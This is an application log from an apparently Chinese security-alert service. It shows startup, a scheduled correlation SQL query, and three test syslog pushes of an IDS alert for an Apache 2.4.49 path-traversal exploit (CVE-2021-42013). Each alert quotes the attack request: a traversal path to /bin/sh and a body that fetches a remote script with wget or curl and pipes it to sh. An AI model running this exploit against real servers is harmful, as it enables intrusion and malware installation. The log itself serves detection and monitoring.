2026-05-19 12:41:02.199 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 12:41:02.250 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 12:41:09.484 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== 初始化实时分析调度器 ==========
2026-05-19 12:41:09.505 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Starting...
2026-05-19 12:41:10.174 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Start completed.
2026-05-19 12:41:10.361 [main] INFO c.c.s.RealtimeAnalysisScheduler - 查询到 1 个实时分析规则
2026-05-19 12:41:16.844 [main] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 规则执行时间已存在,跳过初始化,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:41:16.845 [main] INFO c.c.s.RealtimeAnalysisScheduler - 初始化规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble
2026-05-19 12:41:16.845 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== 实时分析调度器初始化完成 ==========
2026-05-19 12:41:16.854 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: public static com.common.service.DeviceDeviceService com.common.service.AccessLogAlertService.deviceDeviceService
2026-05-19 12:41:16.894 [main] INFO c.c.service.AccessLogAlertService - 初始化AccessLogAlertService,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:41:17.122 [main] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:41:17.780 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 12:41:17.984 [main] INFO com.common.util.MyBatisUtil - MyBatis 初始化成功
2026-05-19 12:41:18.939 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
2026-05-19 12:41:18.954 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
2026-05-19 12:41:18.954 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
2026-05-19 12:41:18.955 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
2026-05-19 12:41:18.956 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
NOT STARTED.
Currently in standby mode.
Number of jobs executed: 0
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
2026-05-19 12:41:18.956 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
2026-05-19 12:41:18.956 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
2026-05-19 12:41:18.956 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@2f42f20f
2026-05-19 12:41:19.200 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 12:41:19.200 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 12:41:19.200 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779165679197
2026-05-19 12:41:19.224 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 12:41:19.224 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 12:41:19.224 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779165679223
2026-05-19 12:41:19.226 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8089"]
2026-05-19 12:41:19.243 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8089 (http) with context path '/xdrservice'
2026-05-19 12:41:19.245 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
2026-05-19 12:41:19.245 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
2026-05-19 12:41:19.267 [main] INFO com.syslogApplication - Started syslogApplication in 24.651 seconds (JVM running for 28.815)
2026-05-19 12:41:19.511 [scheduling-2] INFO c.c.s.RealtimeAnalysisScheduler - 执行规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, nextTime=2026-05-19T12:41, now=2026-05-19T12:41:19.263
2026-05-19 12:41:19.511 [scheduling-2] INFO c.c.s.impl.AnalysisRuleServiceImpl - 执行实时分析规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:41:19.736 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: []
2026-05-19 12:41:19.763 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: [test-topic-0]
2026-05-19 12:41:19.774 [http-nio-8089-exec-1] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring DispatcherServlet 'dispatcherServlet'
2026-05-19 12:41:19.775 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Initializing Servlet 'dispatcherServlet'
2026-05-19 12:41:19.778 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Completed initialization in 3 ms
2026-05-19 12:41:19.982 [scheduling-2] INFO c.c.s.impl.RealtimeAnalysisEngine - 滚动窗口查询范围: 窗口大小=10m,查询时间范围=[2026-05-19 12:31:00, 2026-05-19 12:41:00]
2026-05-19 12:41:19.982 [scheduling-2] INFO c.c.s.impl.RealtimeAnalysisEngine - 开始执行实时规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, batchNo=20260519124119668, windowType=tumble, dataStartTime=2026-05-19 12:31:00, dataEndTime=2026-05-19 12:41:00
2026-05-19 12:41:21.251 [scheduling-2] INFO c.c.s.impl.RealtimeAnalysisEngine - 生成的SQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 12:31:00' AND log_time < '2026-05-19 12:41:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 12:41:21.726 [scheduling-2] INFO c.c.s.impl.RealtimeAnalysisEngine - 规则执行成功: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 12:41:22.033 [scheduling-2] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 更新规则下次执行时间,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble, nextExecuteTime=2026-05-19 12:51:00
2026-05-19 12:41:22.033 [scheduling-2] INFO c.c.s.RealtimeAnalysisScheduler - 本次调度执行规则数: 1, 跳过规则数: 0
2026-05-19 12:41:39.060 [http-nio-8089-exec-3] INFO com.controllers.SyslogPushController - 收到syslog发送请求: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"安恒", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"安恒APT攻击(网络战)预警机", "deviceProductType":"入侵检测系统", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"中国", "srcGeoRegion":"香港", "srcGeoCity":"香港", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"中国", "destGeoRegion":"香港", "destGeoCity":"香港", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "alarmType":"WEB攻击->路径遍历", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013). 来源:192.168.101.1/41614, 目的:192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:41:39.061 [http-nio-8089-exec-3] INFO com.common.service.SyslogService - 开始发送syslog消息: IP=192.168.0.124, Port=514
2026-05-19 12:41:39.062 [http-nio-8089-exec-3] INFO com.common.service.SyslogService - TCP Syslog消息发送成功: 192.168.0.124:514
2026-05-19 12:41:39.062 [http-nio-8089-exec-3] INFO com.controllers.SyslogPushController - Syslog消息发送成功: IP=192.168.0.124, Port=514
2026-05-19 12:42:00.027 [scheduling-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:42:00.027 [log-processor-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:42:00.260 [log-processor-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:42:00.260 [scheduling-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:42:00.939 [log-processor-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:42:00.940 [scheduling-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:42:53.686 [http-nio-8089-exec-1] INFO com.controllers.SyslogPushController - 收到syslog发送请求: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"安恒", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"安恒APT攻击(网络战)预警机", "deviceProductType":"入侵检测系统", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"中国", "srcGeoRegion":"香港", "srcGeoCity":"香港", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"中国", "destGeoRegion":"香港", "destGeoCity":"香港", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "alarmType":"WEB攻击->路径遍历", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013). 来源:192.168.101.1/41614, 目的:192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:42:53.686 [http-nio-8089-exec-1] INFO com.common.service.SyslogService - 开始发送syslog消息: IP=192.168.0.124, Port=514
2026-05-19 12:42:53.687 [http-nio-8089-exec-1] INFO com.common.service.SyslogService - TCP Syslog消息发送成功: 192.168.0.124:514
2026-05-19 12:42:53.687 [http-nio-8089-exec-1] INFO com.controllers.SyslogPushController - Syslog消息发送成功: IP=192.168.0.124, Port=514
2026-05-19 12:43:00.016 [scheduling-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:43:00.016 [log-processor-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:43:00.246 [scheduling-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:43:00.246 [log-processor-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:43:00.516 [log-processor-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:43:00.516 [scheduling-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:44:00.014 [scheduling-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:44:00.014 [log-processor-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:44:00.239 [scheduling-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:44:00.241 [log-processor-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:44:00.499 [log-processor-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:44:00.499 [scheduling-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:45:00.003 [scheduling-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:45:00.003 [log-processor-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:45:00.082 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 12:45:00.227 [log-processor-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:45:00.229 [scheduling-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:45:00.256 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:1,耗时:174ms
2026-05-19 12:45:00.258 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T12:45:00.258
2026-05-19 12:45:00.261 [scheduling-3] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T12:45:00.261
2026-05-19 12:45:00.496 [scheduling-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:45:00.705 [scheduling-3] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 12:45:00.705 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 447ms
2026-05-19 12:45:00.854 [log-processor-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:46:00.010 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T12:46:00.010
2026-05-19 12:46:00.010 [scheduling-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:46:00.010 [log-processor-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:46:00.235 [scheduling-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:46:00.236 [log-processor-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:46:00.472 [scheduling-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:46:00.473 [log-processor-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:46:00.684 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 12:46:00.684 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 12:46:00.684 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 12:46:00.837 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 12:46:00.837 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 12:46:00.838 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:828ms
2026-05-19 12:47:00.001 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:47:00.002 [log-processor-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:47:00.150 [log-processor-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:47:00.224 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:47:00.402 [log-processor-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:47:00.434 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:47:05.252 [http-nio-8089-exec-6] INFO com.controllers.SyslogPushController - 收到syslog发送请求: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"安恒", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"安恒APT攻击(网络战)预警机", "deviceProductType":"入侵检测系统", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"中国", "srcGeoRegion":"香港", "srcGeoCity":"香港", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"中国", "destGeoRegion":"香港", "destGeoCity":"香港", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "alarmType":"WEB攻击->路径遍历", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013). 来源:192.168.101.1/41614, 目的:192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:47:05.253 [http-nio-8089-exec-6] INFO com.common.service.SyslogService - 开始发送syslog消息: IP=192.168.0.124, Port=514
2026-05-19 12:47:05.254 [http-nio-8089-exec-6] INFO com.common.service.SyslogService - TCP Syslog消息发送成功: 192.168.0.124:514
2026-05-19 12:47:05.254 [http-nio-8089-exec-6] INFO com.controllers.SyslogPushController - Syslog消息发送成功: IP=192.168.0.124, Port=514
2026-05-19 12:48:00.018 [scheduling-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:48:00.253 [scheduling-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:48:00.253 [log-processor-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:48:00.490 [log-processor-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:48:00.609 [scheduling-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:48:00.837 [log-processor-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:49:00.005 [scheduling-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:49:00.005 [log-processor-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:49:00.240 [scheduling-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:49:00.240 [log-processor-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:49:00.576 [scheduling-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
